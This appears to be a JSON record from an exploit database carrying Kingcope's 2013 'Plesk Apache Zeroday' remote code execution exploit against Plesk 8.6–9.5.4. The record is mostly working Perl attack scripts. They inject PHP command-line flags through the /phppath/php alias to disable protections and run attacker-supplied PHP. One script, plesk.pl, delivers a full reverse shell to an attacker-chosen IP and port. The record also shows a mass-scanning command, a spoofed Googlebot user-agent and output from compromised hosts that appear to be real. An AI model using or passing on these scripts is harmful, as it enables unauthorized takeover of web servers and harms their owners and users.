"708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d3538c8c4b95b86a156cb12625fdc9b4", "key": "reporter"}, {"hash": "9004ff9499dbe9cd635619a237c378aa", "key": "published"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "021ddebb5f04292003dc996efaabc31c", "key": "href"}, {"hash": "9004ff9499dbe9cd635619a237c378aa", "key": "modified"}, {"hash": "3f994e23765d1364837815722d23d272", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "399c17419a0861907ead8d99aad2faef", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b1cbee3ae63cbcaee8b0d6e852fc1d4d", "key": "sourceHref"}, {"hash": "8b176874af3b304cf5864dda846aa071", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category remote exploits", "hash": "a6ad642a72bcfd4f307db3e60257a04f205bdd923cec363b0f75749e4651ef8a", "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-03-17T03:08:26", "edition": 2, "title": "Plesk Apache Zeroday Remote Exploit", "href": "https://0day.today/exploit/description/20857", "modified": "2013-06-06T00:00:00", "bulletinFamily": "exploit", "viewCount": 10, "cvelist": [], "sourceHref": "https://0day.today/exploit/20857", "references": [], "reporter": "Kingcope", "sourceData": "Plesk Apache zeroday / June 2013\r\ndiscovered & exploited by kingcope\r\n \r\n \r\nthis Plesk configuration setting makes it possible:\r\nscriptAlias /phppath/ \"/usr/bin/\"\r\nFurthermore this is not cve-2012-1823 because the php interpreter is called directly.\r\n(no php file is called)\r\n \r\nParallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution\r\nAffected and tested: Plesk 9.5.4\r\n Plesk 9.3\r\n Plesk 9.2\r\n Plesk 9.0\r\n Plesk 8.6\r\nDiscovered & Exploited by Kingcope / June 2013\r\nAffected and tested OS: RedHat, CentOS, Fedora\r\nAffected and tested Platforms: Linux i386, Linux x86_64\r\nUntested OS: Windows (php.exe?)\r\nUnaffected: 11.0.9 due to compiled in protection of PHP version\r\nTraces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] \"POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%\r\n6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%\r\n62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%\r\n3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1\" 200 203 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\r\nShodanhq overview of Plesk on Linux:\r\nhttp://www.shodanhq.com/search?q=plesklin\r\n \r\nperl plesk-simple.pl <ip address>\r\n...\r\n...\r\n...\r\nOK\r\nLinux ip.unsecure.net 2.6.18-028stab101.1 #1 SMP Sun Jun 24\r\n 19:50:48 MSD 2012 i686 i686 i386 GNU/Linux\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n---\r\n./pnscan -w\"GET /phppath/php HTTP/1.0\\r\\n\\r\\n\" -r \"500 Internal\" 76.12.54.163/16 80\r\nperl plesk-simple.pl 76.12.81.206\r\nHTTP/1.1 200 OK\r\nDate: Sat, 16 Mar 2013 13:39:35 GMT\r\nServer: Apache/2.2.3 (CentOS)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n77\r\nLinux 114114.unsecureweb.com 2.6.18-308.24.1.el5 #1 SMP Tue Dec 4 17:43:34 E\r\nST 2012 x86_64 x86_64 x86_64 GNU/Linux\r\n \r\n3e\r\nuid=48(apache) gid=48(apache) groups=48(apache),2521(psaserv)\r\n \r\n0\r\n \r\nperl plesk-simple-ssl.pl <ip> (use HTTPS because HTTP gave an internal server error)\r\nHTTP/1.1 200 OK\r\nDate: Tue, 19 Mar 2013 15:29:28 GMT\r\nServer: Apache/2.0.54 (Fedora)\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n3\r\nOK\r\n \r\n60\r\nLinux www.ucdavis.edu 2.6.17-1.2142_FC4 #1 Tue Jul 11 22:41:14 EDT 2006 i686 i686 i386 GNU/Linux\r\n \r\n4c\r\nuid=48(apache) gid=48(apache) groups=48(apache),500(webadmin),2522(psaserv)\r\n \r\n0\r\n \r\n \r\n \r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n \r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n \r\n###############################################################################################################\r\n \r\nplesk-simple-ssl.pl\r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\n$sock = IO::Socket::SSL->new(PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\" \r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n#CentOS/Redhat Linux: yum install perl-IO-Socket-SSL.noarch\r\n \r\n \r\n###############################################################################################################\r\n \r\nplesk-simple.pl\r\n \r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket;\r\nuse URI::Escape;\r\n$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n$pwn = '<?php echo \"Content-Type:text/html\\r\\n\\r\\n\";echo \"OK\\n\";system(\"uname -a;id;\"); ?>';\r\n$arguments = uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path = uri_escape(\"phppath\",\"\\0-\\377\") . \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\"\r\n .\"Host: $ARGV[0]\\r\\n\"\r\n .\"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\"\r\n .\"Content-Type: application/x-www-form-urlencoded\\r\\n\"\r\n .\"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\" . $pwn;\r\nwhile(<$sock>) {\r\n print;\r\n}\r\n \r\n \r\n###############################################################################################################\r\n \r\nplesk.pl\r\n \r\n#plesk remote exploit by kingcope\r\n#all your base belongs to me :>\r\nuse IO::Socket;\r\nuse IO::Socket::SSL;\r\nuse URI::Escape;\r\nsub usage {\r\n print \"usage: $0 <target> <http/https> <local_ip> <local_port>\\n\";exit;\r\n}\r\nif (!defined($ARGV[3])){usage();}\r\n$target=$ARGV[0];\r\n$proto=$ARGV[1];\r\nif ($proto eq \"http\") {\r\n$sock = IO::Socket::INET->new(\r\n PeerAddr => $ARGV[0],\r\n PeerPort => 80,\r\n Proto => 'tcp');\r\n}elsif ($proto eq \"https\") {\r\n$sock = IO::Socket::SSL->new(\r\n PeerAddr => $ARGV[0],\r\n PeerPort => 443,\r\n Proto => 'tcp');\r\n}else {usage();}\r\n$lip=$ARGV[2];\r\n$lport=$ARGV[3];\r\n$pwn=\"<?php echo \\\"Content-Type: text/plain\\r\\n\\r\\n\\\";set_time_limit (0); \\$VERSION = \\\"1.0\\\"; \\$ip =\r\n'$lip'; \\$port = $lport; \\$chunk_size = 1400; \\$write_a = null;\r\n\\$error_a = null; \\$shell = '/bin/sh -i'; \\$daemon =\r\n0;\\$debug = 0; if (function_exists('pcntl_fork')) { \\$pid =\r\npcntl_fork(); if (\\$pid == -1) { printit(\\\"ERROR: Can't fork\\\");\r\nexit(1);} if (\\$pid) { exit(0);} if (posix_setsid() == -1) {\r\nprintit(\\\"Error: Can't setsid()\\\"); exit(1); } \\$daemon = 1;} else {\r\nprintit(\\\"WARNING: Failed to daemonise. This is quite common and not\r\nfatal.\\\");}chdir(\\\"/\\\"); umask(0); \\$sock = fsockopen(\\$ip, \\$port,\r\n\\$errno, \\$errstr, 30);if (!\\$sock) { printit(\\\"\\$errstr (\\$errno)\\\");\r\nexit(1);} \\$descriptorspec = array(0 => array(\\\"pipe\\\", \\\"r\\\"),1 =>\r\narray(\\\"pipe\\\", \\\"w\\\"), 2 => array(\\\"pipe\\\", \\\"w\\\"));\\$process =\r\nproc_open(\\$shell, \\$descriptorspec, \\$pipes);if\r\n(!is_resource(\\$process)) { printit(\\\"ERROR: Can't spawn shell\\\");\r\nexit(1);}stream_set_blocking(\\$pipes[0],\r\n0);stream_set_blocking(\\$pipes[1], 0);stream_set_blocking(\\$pipes[2],\r\n0);stream_set_blocking(\\$sock, 0);while (1) { if (feof(\\$sock)) {\r\nprintit(\\\"done.\\\"); break;} if\r\n(feof(\\$pipes[1])) {printit(\\\"done.\\\");break;}\\$read_a = array(\\$sock, \\$pipes[1],\r\n\\$pipes[2]);\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a,\r\n\\$error_a, null);if (in_array(\\$sock, \\$read_a)) {if (\\$debug)\r\nprintit(\\\"SOCK READ\\\");\\$input = fread(\\$sock,\r\n\\$chunk_size);if(\\$debug) printit(\\\"SOCK:\r\n\\$input\\\");fwrite(\\$pipes[0], \\$input);}if (in_array(\\$pipes[1],\r\n\\$read_a)) {if (\\$debug) printit(\\\"STDOUT READ\\\");\\$input =\r\nfread(\\$pipes[1], \\$chunk_size);if (\\$debug) printit(\\\"STDOUT:\r\n\\$input\\\");fwrite(\\$sock, \\$input);}if (in_array(\\$pipes[2],\r\n\\$read_a)) {if (\\$debug) printit(\\\"STDERR READ\\\");\\$input =\r\nfread(\\$pipes[2], \\$chunk_size); if (\\$debug) printit(\\\"STDERR:\r\n\\$input\\\");fwrite(\\$sock,\r\n\\$input);}}fclose(\\$sock);fclose(\\$pipes[0]);fclose(\\$pipes[1]);fclose(\\$pipes[2]);proc_close(\\$process);function printit (\\$string) {if (!\\$daemon) {print\r\n\\\"\\$string\\n\\\";}}\r\n?>\";\r\n$arguments=uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"allow_url_include=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"safe_mode=off\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"suhosin.simulation=on\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"disable_functions=\\\"\\\"\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"open_basedir=none\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-d\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"auto_prepend_file=php://input\",\"\\0-\\377\"). \"+\" .\r\n uri_escape(\"-n\",\"\\0-\\377\");\r\n$path=uri_escape(\"phppath\",\"\\0-\\377\"). \"/\" . uri_escape(\"php\",\"\\0-\\377\");\r\nprint $sock \"POST /$path?$arguments HTTP/1.1\\r\\n\".\r\n \"Host: $ARGV[0]\\r\\n\".\r\n \"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\\r\\n\".\r\n \"Content-Type: text/plain\\r\\n\".\r\n \"Content-Length: \". length($pwn) .\"\\r\\n\\r\\n\". $pwn;\r\nwhile(<$sock>){print $_;};\r\n \r\n \r\n###############################################################################################################\n\n# 0day.today [2018-03-17] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "399c17419a0861907ead8d99aad2faef", "key": "description"}, {"hash": "340deb420b1b666cc751f41ff0431610", "key": "href"}, {"hash": "9004ff9499dbe9cd635619a237c378aa", "key": "modified"}, {"hash": "9004ff9499dbe9cd635619a237c378aa", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d3538c8c4b95b86a156cb12625fdc9b4", "key": "reporter"}, {"hash": "fb085c5503470bd6431f8b6128eedcc9", "key": "sourceData"}, {"hash": "94160decc0c612e32a01ba51f53d8380", "key": "sourceHref"}, {"hash": "8b176874af3b304cf5864dda846aa071", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"result": {}}
